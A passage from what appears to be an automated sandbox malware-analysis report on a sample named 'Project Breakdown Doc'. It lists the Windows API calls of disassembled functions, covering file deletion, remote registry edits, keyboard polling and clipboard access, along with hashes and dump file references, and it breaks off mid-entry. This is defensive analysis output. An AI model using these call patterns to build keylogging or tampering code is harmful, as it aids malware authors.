                                                  • __swprintf.LIBCMT ref: 00CACC7E
                                                  • __swprintf.LIBCMT ref: 00CACCCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: 18ea62a88d47a28338844fc994761213e50e71926bc9b71847ea9bd353227b0e
                                                  • Instruction ID: ad9aee72558d8f8e7dd12fbd293da56f4aabd9c0700c191d0438349ccbb07b18
                                                  • Opcode Fuzzy Hash: 18ea62a88d47a28338844fc994761213e50e71926bc9b71847ea9bd353227b0e
                                                  • Instruction Fuzzy Hash: 70A13DB1508315ABC710EBA4C885EAFB7ECFF99704F404929F596C3191EB34DA09DB62
                                                  Function 00CAF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CAF221
                                                  • _wcscmp.LIBCMT ref: 00CAF236
                                                  • _wcscmp.LIBCMT ref: 00CAF24D
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00CAF25F
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00CAF279
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00CAF291
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF29C
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00CAF2B8
                                                  • _wcscmp.LIBCMT ref: 00CAF2DF
                                                  • _wcscmp.LIBCMT ref: 00CAF2F6
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CAF308
                                                  • SetCurrentDirectoryW.KERNEL32(00CFA5A0), ref: 00CAF326
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CAF330
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF33D
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF34F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 912e2b1d88792e76b659d6bc72b553c58b4d9fc5d5a879a1470f9068212ee5b6
                                                  • Instruction ID: c0a12bef4bb10e2f15d008db81b00ee28e9e5d2eddb05e261bdf71a4a840e704
                                                  • Opcode Fuzzy Hash: 912e2b1d88792e76b659d6bc72b553c58b4d9fc5d5a879a1470f9068212ee5b6
                                                  • Instruction Fuzzy Hash: C731C17650120A6ACF20DBF0DC88FEEB3AC9F4A325F14427DE914D30A0EB70DA468A50
                                                  Function 00CC0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0BDE
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CCF910,00000000,?,00000000,?,?), ref: 00CC0C4C
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CC0C94
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CC0D1D
                                                  • RegCloseKey.ADVAPI32(?), ref: 00CC103D
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC104A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: 30d5765e1cd7bcd02b465ec8181a9e13f83705ad0f1883c882e95701b150d6a5
                                                  • Instruction ID: fea9f8793c3e0fa1f6d2d0d5737a1f0e74a1c2e05cc427931e8800a29876588f
                                                  • Opcode Fuzzy Hash: 30d5765e1cd7bcd02b465ec8181a9e13f83705ad0f1883c882e95701b150d6a5
                                                  • Instruction Fuzzy Hash: 5E0279752006519FCB14EF25C891E2AB7E5FF89714F04885DF99A9B3A2CB30ED41DB82
                                                  Function 00CAF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CAF37E
                                                  • _wcscmp.LIBCMT ref: 00CAF393
                                                  • _wcscmp.LIBCMT ref: 00CAF3AA
                                                    • Part of subcall function 00CA45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CA45DC
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00CAF3D9
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF3E4
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00CAF400
                                                  • _wcscmp.LIBCMT ref: 00CAF427
                                                  • _wcscmp.LIBCMT ref: 00CAF43E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00CAF450
                                                  • SetCurrentDirectoryW.KERNEL32(00CFA5A0), ref: 00CAF46E
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CAF478
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF485
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF497
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 484ac238346ec9f8bf55c2e5a24b21aafd7eb578428b4fa769ce4a6190c688c2
                                                  • Instruction ID: 51cc586a88bfc1c8cc50044f5cda65995658534c47edbb23b62bc293b01499bd
                                                  • Opcode Fuzzy Hash: 484ac238346ec9f8bf55c2e5a24b21aafd7eb578428b4fa769ce4a6190c688c2
                                                  • Instruction Fuzzy Hash: 7D31C67150111E6FCF109BA4DC88FEE77AD9F4A368F140279E914A20A0D730DF46DA64
                                                  Function 00C981F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98766
                                                    • Part of subcall function 00C9874A: GetLastError.KERNEL32(?,00C9822A,?,?,?), ref: 00C98770
                                                    • Part of subcall function 00C9874A: GetProcessHeap.KERNEL32(00000008,?,?,00C9822A,?,?,?), ref: 00C9877F
                                                    • Part of subcall function 00C9874A: HeapAlloc.KERNEL32(00000000,?,00C9822A,?,?,?), ref: 00C98786
                                                    • Part of subcall function 00C9874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C9879D
                                                    • Part of subcall function 00C987E7: GetProcessHeap.KERNEL32(00000008,00C98240,00000000,00000000,?,00C98240,?), ref: 00C987F3
                                                    • Part of subcall function 00C987E7: HeapAlloc.KERNEL32(00000000,?,00C98240,?), ref: 00C987FA
                                                    • Part of subcall function 00C987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C98240,?), ref: 00C9880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9825B
                                                  • _memset.LIBCMT ref: 00C98270
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9828F
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C982A0
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C982DD
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C982F9
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C98316
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C98325
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C9832C
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9834D
                                                  • CopySid.ADVAPI32(00000000), ref: 00C98354
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C98385
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C983AB
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C983BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 9c34adff1ecdb791654fd70cbdf50d1cc51ae37ae639cae9af1fac3917cc1c2b
                                                  • Instruction ID: 16bf70602653c6a868a9cb8377223dd49c88b4da38b03723689e349a8a27d861
                                                  • Opcode Fuzzy Hash: 9c34adff1ecdb791654fd70cbdf50d1cc51ae37ae639cae9af1fac3917cc1c2b
                                                  • Instruction Fuzzy Hash: 0E613D71904209AFDF109F94DC49EAEBBB9FF05700F148169F825A72A1DB359A09CB60
                                                  Function 00C56843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                  • API String ID: 0-4052911093
                                                  • Opcode ID: 9289df07f666fecc6e421360c7799960b18e342537e37d75a129b129bb4ff118
                                                  • Instruction ID: 028060a62c5b8bda90c38c95a0e2a139651a33ea245d8912db4402a6ba41e38b
                                                  • Opcode Fuzzy Hash: 9289df07f666fecc6e421360c7799960b18e342537e37d75a129b129bb4ff118
                                                  • Instruction Fuzzy Hash: BE72A175E0021A8BDF24CF59C8857AEB7B5FF48310F54816AEC59EB280DB309E85DB94
                                                  Function 00C7418A Relevance: 18.3, APIs: 12, Instructions: 273timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock.LIBCMT ref: 00C741AF
                                                    • Part of subcall function 00C69E4B: __mtinitlocknum.LIBCMT ref: 00C69E5D
                                                    • Part of subcall function 00C69E4B: EnterCriticalSection.KERNEL32(00000000,?,00C69CBC,0000000D), ref: 00C69E76
                                                  • ____lc_codepage_func.LIBCMT ref: 00C741F6
                                                  • __getenv_helper_nolock.LIBCMT ref: 00C74217
                                                  • _free.LIBCMT ref: 00C7424A
                                                    • Part of subcall function 00C62F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C64), ref: 00C62FA9
                                                    • Part of subcall function 00C62F95: GetLastError.KERNEL32(00000000,?,00C69C64), ref: 00C62FBB
                                                  • _strlen.LIBCMT ref: 00C74251
                                                  • __malloc_crt.LIBCMT ref: 00C74258
                                                  • _strlen.LIBCMT ref: 00C74276
                                                  • __invoke_watson.LIBCMT ref: 00C74299
                                                  • _free.LIBCMT ref: 00C742A8
                                                  • GetTimeZoneInformation.KERNEL32(00D04AF8,00000000,00000000,00000000,00000000,00000000,00CFC070,00000030,00C73F3B,00CFC050,00000008,00C670B8), ref: 00C742B9
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00D04AFC,000000FF,?,0000003F,00000000,?), ref: 00C74332
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00D04B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 00C7436B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone____lc_codepage_func__getenv_helper_nolock__invoke_watson__lock__malloc_crt__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2302051780-0
                                                  • Opcode ID: f0d8a206ad2dabd6275ad7591d20f24ae7c47b7e0b8495396869a19f001c4cdf
                                                  • Instruction ID: 13c080d11eb8ea2c1736dedd34366d7cb1ed70fe24d5131859dc1975a2f717e6
                                                  • Opcode Fuzzy Hash: f0d8a206ad2dabd6275ad7591d20f24ae7c47b7e0b8495396869a19f001c4cdf
                                                  • Instruction Fuzzy Hash: 35A1B1B1D002459EDF199FA9D881BADBBB8BF09710F14811AF52CF72A1D7348E41EB24
                                                  Function 00CC0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00CC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC0038,?,?), ref: 00CC10BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC0737
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CC07D6
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CC086E
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CC0AAD
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00CC0ABA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 0f85c93ee4a56f9589bb3060355e2719a8d8c1efe9ba30ce49c3e506d4730c5f
                                                  • Instruction ID: 02f7d9fcdd31005fef3b62c6b0a5b3cb88cbfeb4cb156a0c7fb65292af2599f6
                                                  • Opcode Fuzzy Hash: 0f85c93ee4a56f9589bb3060355e2719a8d8c1efe9ba30ce49c3e506d4730c5f
                                                  • Instruction Fuzzy Hash: 70E14B31204210EFCB14DF25C885E6BBBE9FF89714B14856DF85ADB2A2DB30E905DB51
                                                  Function 00CA0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00CA0241
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00CA02C2
                                                  • GetKeyState.USER32(000000A0), ref: 00CA02DD
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00CA02F7
                                                  • GetKeyState.USER32(000000A1), ref: 00CA030C
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00CA0324
                                                  • GetKeyState.USER32(00000011), ref: 00CA0336
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00CA034E
                                                  • GetKeyState.USER32(00000012), ref: 00CA0360
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00CA0378
                                                  • GetKeyState.USER32(0000005B), ref: 00CA038A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 0f7852ccdf1a7ec8869f076b82a839e4e635b037364ddccbd0e03991711c8bf3
                                                  • Instruction ID: 3627573b8d37a2c9ef64dcfb124696f29a9d94163bd852bbff8b9893d40f4d81
                                                  • Opcode Fuzzy Hash: 0f7852ccdf1a7ec8869f076b82a839e4e635b037364ddccbd0e03991711c8bf3
                                                  • Instruction Fuzzy Hash: D541D9345057CB6EFF318B64C8087A5BEA16F133C8F28819DD6D6461C2E7955BC887A2
                                                  Function 00CB86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • CoInitialize.OLE32 ref: 00CB8718
                                                  • CoUninitialize.OLE32 ref: 00CB8723
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00CD2BEC,?), ref: 00CB8783
                                                  • IIDFromString.OLE32(?,?), ref: 00CB87F6
                                                  • VariantInit.OLEAUT32(?), ref: 00CB8890
                                                  • VariantClear.OLEAUT32(?), ref: 00CB88F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: a19be72d01cca4cadcadd0fbf4d00b05d859fa6ec13d685cb208cb0e1820cd9d
                                                  • Instruction ID: 961239a532e6fdbe2bce5ab52974d9188c952e4aa05dc652c5e5b18e5cb97278
                                                  • Opcode Fuzzy Hash: a19be72d01cca4cadcadd0fbf4d00b05d859fa6ec13d685cb208cb0e1820cd9d
                                                  • Instruction Fuzzy Hash: 17619D70608311AFD710DF65C848BABBBE8EF49718F14481DF995AB291CB71ED48CB92
                                                  Function 00CB4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: 58c3316cdcfc4b6f788f04b9c7803f1966765b25a4dd2f720e315acb7a835309
                                                  • Instruction ID: 30659d9e09ccd6791fd867205d27fbab0462801f72bd1072f0a3b04c0dea1dfc
                                                  • Opcode Fuzzy Hash: 58c3316cdcfc4b6f788f04b9c7803f1966765b25a4dd2f720e315acb7a835309
                                                  • Instruction Fuzzy Hash: 3F21B035200620AFDB14AF64EC09FAE77AAEF04711F10802AF946DB3B2CB30AD01DB55
                                                  Function 00CA3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                    • Part of subcall function 00CA4CD3: GetFileAttributesW.KERNEL32(?,00CA3947), ref: 00CA4CD4
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00CA3ADF
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CA3B87
                                                  • MoveFileW.KERNEL32(?,?), ref: 00CA3B9A
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CA3BB7
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CA3BD9
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CA3BF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 5a96f00995f9ea54b3561f95cecc89d776fcf6f806013bf8e6c7718cd891e45c
                                                  • Instruction ID: 8fc4629efaea9d7248565b0434f632ee4b013fc2678c15098a7ca50e7d41b4b8
                                                  • Opcode Fuzzy Hash: 5a96f00995f9ea54b3561f95cecc89d776fcf6f806013bf8e6c7718cd891e45c
                                                  • Instruction Fuzzy Hash: C951603180129D9FCF15EBA0DDA29EDB779AF15304F644169F45277092DF206F09EBA0
                                                  Function 00CAF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CAF6AB
                                                  • Sleep.KERNEL32(0000000A), ref: 00CAF6DB
                                                  • _wcscmp.LIBCMT ref: 00CAF6EF
                                                  • _wcscmp.LIBCMT ref: 00CAF70A
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00CAF7A8
                                                  • FindClose.KERNEL32(00000000), ref: 00CAF7BE
                                                  Strings
                                                  Memory Dump Source
